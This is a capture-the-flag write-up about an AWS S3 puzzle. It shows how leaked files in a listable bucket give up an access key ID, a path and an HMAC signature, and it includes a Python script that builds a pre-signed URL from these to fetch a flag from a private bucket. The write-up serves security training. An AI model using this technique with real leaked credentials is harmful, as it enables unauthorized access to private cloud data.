We get a letter:
Hey Fellow Coworker,
Heard you were coming into the Sacramento office today. I have some sensitive information for you to read out about company stored at ad586b62e3b5921bd86fe2efa4919208 once you are settled in. Make sure you're a valid user!
Don't read it all yet since they might be watching. Be sure to read it once you are back in Columbus.
Act quickly! All of this stuff will disappear a week from 19:53:23 on September 9th 2020.
- Totally Loyal Coworker
The first step is to find out what the mysterious hex string is. There are a lot of hints in the task about cloud stuff, and that something is stored at this location. So im thinking S3 buckets or something similar. We quickly found the S3 bucket ad586b62e3b5921bd86fe2efa4919208 on amazonaws and had to have a valid account to list the files in it. It consists of many folders with random names. But one file contains an AWS access key id, another one a secret string, a third one a folder path The last interesting file contains a sha256 hmac signature:
With all of these values we can craft a pre-signed url to access the new bucket. Let's try to access
in this bucket.
I crafted the url using the following script. The date used is the date mentioned in the letter, and expiry time is set to one week.
logger = logging.getLogger(__name__)
def generate_presigned_s3_get(bucket, object_key, region, expires_in, access_key, signature):
METHOD = 'GET'
SERVICE = 's3'
ENCODING = 'utf8'
host = bucket + '.s3.' + region + '.amazonaws.com'
endpoint = 'https://' + host
t = datetime.datetime(2020, 9, 9, 19, 53, 23)
amz_date = t.strftime('%Y%m%dT%H%M%SZ')
datestamp = t.strftime('%Y%m%d')
canonical_uri = '/' + object_key
canonical_headers = 'host:' + host + '\n'
signed_headers = 'host'
algorithm = 'AWS4-HMAC-SHA256'
credential_scope = datestamp + '/' + region + '/' + SERVICE + '/' + 'aws4_request'
canonical_querystring = '?X-Amz-Algorithm=AWS4-HMAC-SHA256'
canonical_querystring += '&X-Amz-Credential=' + urllib.parse.quote_plus(access_key + '/' + credential_scope)
canonical_querystring += '&X-Amz-Date=' + amz_date
canonical_querystring += '&X-Amz-Expires=' + str(expires_in)
canonical_querystring += '&X-Amz-SignedHeaders=' + signed_headers
canonical_request = METHOD + '\n' + canonical_uri + '\n' + canonical_querystring[1:] + '\n' + canonical_headers + '\n' + signed_headers + '\nUNSIGNED-PAYLOAD'
string_to_sign = algorithm + '\n' + amz_date + '\n' + credential_scope + '\n' + hashlib.sha256(canonical_request.encode(ENCODING)).hexdigest()
canonical_querystring += '&X-Amz-Signature=' + signature
url = endpoint + canonical_uri + canonical_querystring
logger.info('presigned url: %s' % url)
BUCKET = 'super-top-secret-dont-look'
REGION = 'us-east-2'
CREDS = 'AKIAQHTF3NZUTQBCUQCK'
EXPIRES = 604800
SIGNATURE = '3560cef4b02815e7c5f95f1351c1146c8eeeb7ae0aff0adc5c106f6488db5b6b'
url = generate_presigned_s3_get(BUCKET,'.sorry/.for/.nothing/flag.txt', REGION, EXPIRES, CREDS, SIGNATURE)
r = requests.get(url)